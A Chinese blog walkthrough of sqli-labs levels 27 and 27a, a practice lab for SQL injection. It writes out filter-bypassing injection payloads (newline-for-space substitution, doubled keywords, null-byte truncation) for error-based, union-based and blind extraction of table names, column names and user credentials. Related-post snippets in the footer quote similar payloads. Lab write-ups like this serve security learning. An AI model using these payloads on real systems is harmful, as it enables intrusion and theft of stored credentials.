sqli-labs第27关,27a关

已于 2024-07-30 17:18:42 修改
阅读量515 收藏 7
点赞数 7
分类专栏: sqli-labs 文章标签: 数据库
于 2024-07-30 17:17:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46023655/article/details/140780677
版权

第27关

这一关union、select以及空格都被过滤,但这次惊喜发现%0a可以替换空格

先判断是字符型还是数字型注入

?id=1%0aand%0a1=1

?id=1%0aand%0a1=2

1 and 1=1, 1 and 1=2都显示正常,故为字符型注入,继续判断是什么注入类型

采用单引号,发现报错

进行闭合,发现采用--+以及#等注释符都不起作用,故注释符也被过滤,采用其它闭合方式,id=2' and '1'='1

id=2'%0aand%0a'1'='1

一般流程是猜测字段数用order by,但发现不管order by 数字如何,都是返回正确的,且没有报错

这里拿sqli-labs第一关试下

第一关是单引号注入,进行单引号闭合,分别采用注释符和'1'='1

结果都正常,在此基础上分别猜测字段数,采用order by 4

结果发现只有在注释符的作用下,Order by 4才能显示报错信息,所以如果后面不是采用注释符进行闭合,order by 数字不起作用

emmm,还是不知道为啥order by不起作用,或许被强制转换了?或者本来就没有这个用法。

反正这个方法得出字段数行不通;

有报错信息,那就采用基于报错的SQL注入得出数据库

?2'%0aand%0aupdatexml(1,concat(0x7e,database()),1)%0aand%0a'1'='1

得出表名

?id=2'%0aand%0aupdatexml(1,concat(0x7e,(SESELECTLECT%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema='security')),1)%0aand%0a'1'='1

这里select采用大写复写绕过,SESELECTLECT,反正小写复写不行,url编码也不行

得出列名,%0a替换空格

?id=2' and updatexml(1,concat(0x7e,(SELECT group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),1) and '1'='1

同理得出用户名密码,略

-------

方法二

补充,上网查了一下,发现这个操作可以得出字段数,oder by x;%00,直接用;结束,然后%00起截断作用,是字符串的结束标志,这样可以绕过后面的,如果去掉%00不起作用

代码

?id=2'%0aorder%0aby%0a4;%00

order by 3;%00的时候正确,说明字段数为3

得出回显点,union采用小写复写

?id=0'%0aununionion%0aSESELECTLECT%0a1,2,3;%00

得出表名

?id=0'%0aununionion%0aSESELECTLECT%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()%0aand'1'='1

得出列名

?id=0%27%0aununionion%0aSESELECTLECT%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_schema=database()%0aand%0atable_name=%27users%27;%00

得出用户名、密码

?id=0%27%0aununionion%0aSESELECTLECT%0a1,2,group_concat(username,%27:%27,password)%0afrom%0ausers;%00

第27a关

这一关是字符型双引号注入,且没有报错信息,无法得出字段数,但此关%0a仍然可以替换空格

1.采用SQL盲注

判断数据库大小

同样可以用截断方式

?id=2"%0aand%0alength(database())=8;%00

判断数据库

得出第一个字符为s,以此类推,得出数据库为security,同理得出表名,列名

------

2.采用联合注入方法

这里是采用Union方式得出回显点和数据库名(有点上帝视角,因为不会报错,不知道字段有几个)

?id=0"%0aununionion%0aSESELECTLECT%0a1,2,database();%00

得出表名

?id=2"%0aand%0aascii(mid(concat(0x7e,(SESELECTLECT%0atable_name%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()%0alimit%0a0,1)),1,1))=101;%00

同理可得出users列名,用户名、密码

熊熊爱吃不胖
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-26、26a、2727a、28、28a(sqli-labs闯指南 26、26a、2727a、28、28a)—Advanced injection
m0_54899775的博客
12-25 1329
sqli-labs Less-26、26a、2727a、28、28a(sqli-labs闯指南 26、26a、2727a、28、28a)—Advanced injection
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1677
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs(27a)
weixin_30438813的博客
05-28 234
0X01测试闭合 ?id=1" 报错 ?id=1"" 正常 0X02构造语句爆数据库名称 ?id=99"%0AUNIon%0ASELECt%0A1,database(),3||"1"="1 和27一样 只是 ’ 变成了 ” 其他语法就是打组合拳 0X03组合拳 27见 PS 学习之路 少就是多 慢就是快 转载于:https://...
sqli-labs(27)
weixin_30901729的博客
05-28 439
0X01 先查询闭合 ?id=1' 报错 ?id=1'' 正确 知道是’的闭合语句 0X02那么开始我们的注入之旅 空格过滤了 尝试一下%0a绕过 #也被过滤了 那么用and '1'='1构造闭合 ?id=1'||'1'='1 显示正确 我们来爆一下数据名称 哦豁 union select 被过滤了 /?id=1'%0Aunion%0Asel...
Sqlilabs-27
KAKA的博客
07-14 817
题目告诉我们本卡过滤了 union 和 select,其实还有空格,这一也过滤了 尝试双写绕过,不行 那就大小写绕过,成功 –查表 http://sqlilabs/Less-27/?id=1'and(extractvalue(1,concat(0x7e,(SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e)))and'1'='1 –查列 http://s.
sqli-labs ————less -27(union、SELECT、绕过滤)
Fly_鹏程万里
05-19 1928
Less-27从提示界面中我们可以看出这一小节对union、select进行了绕过,那么我们下面来看看源代码吧:SQL语句:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";过滤机制:function blacklist($id) { $id= preg_replace('/[\/\*]/',"", $id); //strip out /* ...
SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注_sqli-labs第27a
最新发布
2401_84254343的博客
06-21 677
需要注意的是,键字只过滤了union、UNION、Union,这三种形式,可以使用其他的大小写组合绕过。这一是查询功能,地址栏输入id作为参数,后台根据id查询用户数据,并在前端页面显示出来。确定第一个字符的内容后,再按照此方法判断其余字符,为了提高效率,稍后使用脚本去枚举。参数中添加双引号,页面异常(空)显示,说明后台隐藏了报错信息,不适合报错注入。字符的ASCLL码肯定大于1,所以页面正常显示,确定payload可用;输入不同的参数,页面会动态显示对应的用户数据,可以考虑联合注入。
CTFshow-sqli-labs
Leo8283的博客
04-20 702
CTFshow sql-labs刷题记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
sqli-labs-php7环境搭建及通记录
weixin_44644249的博客
10-28 1693
sqli-labs-php7环境搭建及通记录 sqli-labs-php7环境搭建及通记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
sqli-labs26-32
willow_liang的博客
11-06 536
Less-26 代码分析 空格的绕过方法: +也可以代替空格 以下这些在windows+apache环境下解析会出问题??? %09 TAB 键(水平) %0a 新建一行 %0c 新的一页 %0d return 功能 %0b TAB 键(垂直) %a0 空格(长payload出问题)原因不知 由于不能使用注释符,可以构造一个’payload’ 1.基于布尔测试漏洞是否存在 2.使用报错注入或者时间盲注 0'+||extractvalue(1,concat(0x5c,version()))
SQLI-labs-第二十七和第二十七a
weixin_54055099的博客
05-29 662
SQLI-labs-第二十七和第二十七a,绕过过滤
sqli-labs ————less -27a(union、SELECT、绕过滤)
Fly_鹏程万里
05-16 689
Less-27a与第27的去呗在于对于ID的处理,这里使用了“ ””,同时mysql的错误提示被屏蔽,所以报错注入无法进行。对于过滤的绕过技巧在上一节中已经讲过了,这里不再多说了。下面给出一个payload:http://192.168.11.136/sqli-labs/Less-27a?id=1"%a0UnIon%a0SElecT%a01,user(),"3读者有兴趣可以自己测试哈!...
sqlilabs less-27~27a
TA不懒,但还没有添加简介
07-20 306
sqlilabs less-27~27a
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三SQLi-LABS Less-23,SQLi-LABS Less 23,SQLiLABS Less23,SQLi Less 23
SQLi Labs Lesson27 & Lesson27a
1ame的博客
08-23 439
Lesson - 27 GET - Error Based - All your UNION & SELECT Belong to us - String - Single Quotes 首先进入欢迎界面: 构造 ?id=1,结果如图所示: 构造 ?id=1',结果如图所示: 由错误回显信息推测后台SQL语句结构: select ...
SQL-labs的第27——union和select被屏蔽 报错注入(Get)
qq_73393033的博客
08-04 456
注意:该的空格、注释也被屏蔽了。
(手工)【sqli-labs2727a】报错回显、布尔盲注、过滤后注入
07-13 876
SQL-报错、布尔、过滤】
Sqlilabs Less-27-28a Trick with SELECT & UNION
baynk的博客
04-02 395
Less-27 Trick with SELECT & UNION - Single Quote 手工注入 感觉和26没什么区别,一样的。。。 函数分析 preg_replace() 下面列出了当前可用的 PCRE 修饰符。括号中提到的名字是 PCRE 内部这些修饰符的名称。模式修饰符中的空格,换行符会被忽略,其他字符会导致错误。 i (PCRE_CASELESS) 如果设置了这个修...
sqli-labs闯
10-09
很高兴为您解答sqli-labs闯的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯,您可以按照以下步骤进行: 1. 下载sqli-labs:您可以在GitHub上找到sqli-labs的源代码并下载到本地环境。 2. 配置环境:根据sqli-labs的README文件,您需要配置适当的web服务器环境(例如Apache、PHP等)以及数据库(例如MySQL)。 3. 导入数据库:使用提供的SQL脚本文件,导入sqli-labs所需的数据库结构和数据。 4. 开始闯:访问您的本地服务器,并根据提示依次完成每个卡。每个卡都会提供一个具有潜在SQL注入漏洞的页面,您需要利用这些漏洞来获取敏感信息或执行其他恶意操作。 5. 学习和实践:在完成每个卡后,阅读解释和提示,深入了解所使用的攻击技术和漏洞原理。尝试自己设计和实现一些新的攻击方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值